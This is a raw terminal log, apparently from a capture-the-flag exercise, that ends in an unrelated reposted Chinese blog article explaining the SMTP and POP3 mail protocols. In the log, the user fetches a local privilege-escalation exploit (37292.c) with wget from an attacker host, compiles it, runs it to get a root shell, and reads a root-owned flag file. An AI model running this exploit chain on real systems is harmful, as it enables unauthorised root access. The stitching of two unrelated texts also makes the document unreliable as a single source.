Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ wget http://192.168.219.177:8888/37292.c
--2022-12-24 06:14:47-- http://192.168.219.177:8888/37292.c
Connecting to 192.168.219.177:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c.1'
0K .... 100% 874M=0s
2022-12-24 06:14:47 (874 MB/s) - '37292.c.1' saved [4968/4968]
$ ls
37292-2.c
37292.c
37292.c.1
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
img
includes
rpc.php
$ cc 37292.c.1 -o exp22
37292.c.1: file not recognized: File format not recognized
clang: error: linker command failed with exit code 1 (use -v to see invocation)
$ ^[[A^[[D : not found
$ in/sh: 17:
$ cc 37292.c -o exp22
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
$ ./exp22
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
$ ls
37292-2.c
37292.c
37292.c.1
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
exp22
img
includes
rpc.php
$ mv 37292.c.1 3729222.c
$ cc 3729222.c -o exp22
3729222.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
3729222.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
3729222.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
3729222.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
3729222.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
$ ./exp22
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# ls
37292-2.c
37292.c
3729222.c
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
exp22
img
includes
rpc.php
# cd /root
# ls -al
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat ./flag.txt
cat: ./flag.txt: No such file or directory
# cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
#
PS
no GCC
so need using cc
邮件传输协议简介
1.邮件传输概念
邮件服务是Internet上最常用的服务之一,它提供了与操作系统平台无关的通信服务,使用邮件服务,用户可通过电子邮件在网络之间交换数据信息。邮件传输包括将邮件从发送者客户端发往邮件服务器,以及接收者从邮件服务器将邮件取回到接收者客户端。
2.SMTP和POP3
在TCP/IP协议簇中,一般使用SMTP协议发送邮件,POP3协议接收邮件。
SMTP,全称Simple Message Transfer Protocol,中文名为简单邮件传输协议,工作在TCP/IP层次的应用层。SMTP采用Client/Server工作模式,默认使用TCP 25端口,提供可靠的邮件发送服务。
POP3,全称Post Office Protocol 3,中文名为第三版邮局协议,工作在TCP/IP层次的应用层。POP3采用Client/Server工作模式,默认使用TCP 110端口,提供可靠的邮件接收服务。
3.SMTP和POP3的工作原理
发送和接收邮件都需要以下两个组件:用户代理(UA,常用的是Foxmail或Outlook)和SMTP/POP3服务器。
SMTP工作原理:
1)客户端使用TCP协议连接SMTP服务器的25端口;
2)客户端发送HELO报文将自己的域地址告诉给SMTP服务器;
3)SMTP服务器接受连接请求,向客户端发送请求账号密码的报文;
4)客户端向SMTP服务器传送账号和密码,如果验证成功,向客户端发送一个OK命令,表示可以开始报文传输;
5)客户端使用MAIL命令将邮件发送者的名称发送给SMTP服务器;
6)SMTP服务器发送OK命令做出响应;
7)客户端使用RCPT命令发送邮件接收者地址,如果SMTP服务器能识别这个地址,就向客户端发送OK命令,否则拒绝这个请求;
8)收到SMTP服务器的OK命令后,客户端使用DATA命令发送邮件的数据。
9)客户端发送QUIT命令终止连接。
POP3工作原理:
1)客户端使用TCP协议连接邮件服务器的110端口;
2)客户端使用USER命令将邮箱的账号传给POP3服务器;
3)客户端使用PASS命令将邮箱的账号传给POP3服务器;
4)完成用户认证后,客户端使用STAT命令请求服务器返回邮箱的统计资料;
5)客户端使用LIST命令列出服务器里邮件数量;
6)客户端使用RETR命令接收邮件,接收一封后便使用DELE命令将邮件服务器中的邮件置为删除状态;
7)客户端发送QUIT命令,邮件服务器将将置为删除标志的邮件删除,连接结束。
(注:客户端UA可以设定将邮件在邮件服务器上保留备份,而不将其删除。)
————————————————
版权声明:本文为CSDN博主「Harrison_zhu」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Harrison_zhu/article/details/2677863